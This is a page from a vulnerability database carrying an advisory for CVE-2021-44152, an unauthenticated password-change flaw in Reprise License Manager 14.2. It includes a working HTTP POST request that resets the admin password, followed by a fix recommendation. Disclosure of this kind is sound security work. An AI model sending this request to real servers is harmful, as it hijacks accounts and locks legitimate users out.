Lucene search
Andreas Fyhn Andersen1337DAY-ID-37111HistoryDec 08, 2021 - 12:00 a.m.
Reprise License Manager 14.2 Unauthenticated Password Change Vulnerability
2021-12-0800:00:00
Andreas Fyhn Andersen
0day.today
262
0.875 High
EPSS
Percentile
98.7%
# Product: Reprise License Manager 14.2
# Vendor: Reprise Software
# CVE ID: CVE-2021-44152
# Vulnerability Title: Unauthenticated Password Change
# Severity: High
# Author(s): Mark Staal Steenberg, Bilal El Ghoul, Gionathan Armando Reale, Andreas Fyhn Andersen, Oliver Lind Nordestgaard
#############################################################
Introduction:
Because /goform/change_password_process does not verify authentication or authorization, an unauthenticated user can change the password of any existing user. This allows an attacker to change the password of any known user, thereby preventing valid users from accessing the system and granting the attacker full access to that user's account.
Vulnerability:
If an unauthenticated user sends the following HTTP request they can change the password of any user:
POST /goform/change_password_process HTTP/1.1
Host: 127.0.0.1:5054
Content-Length: 53
pw1=passwd&pw2=passwd&user=admin&ok=CHANGE%2BPASSWORD
Recommendation:
Ensure that authentication is required prior to password change requests and that users cannot modify or change passwords of others users.
Related
nuclei
nuclei
Reprise License Manager 14.2 - Authentication Bypass
2022-04-10 07:11:31
prion
prion
Authentication flaw
2021-12-13 04:15:00
cnvd
cnvd
cvelist
cvelist
CVE-2021-44152
2021-12-13 00:00:00
nvd
nvd
CVE-2021-44152
2021-12-13 04:15:07
cve
cve
CVE-2021-44152
2021-12-13 04:15:07
packetstorm
packetstorm
Reprise License Manager 14.2 Unauthenticated Password Change
2021-12-08 00:00:00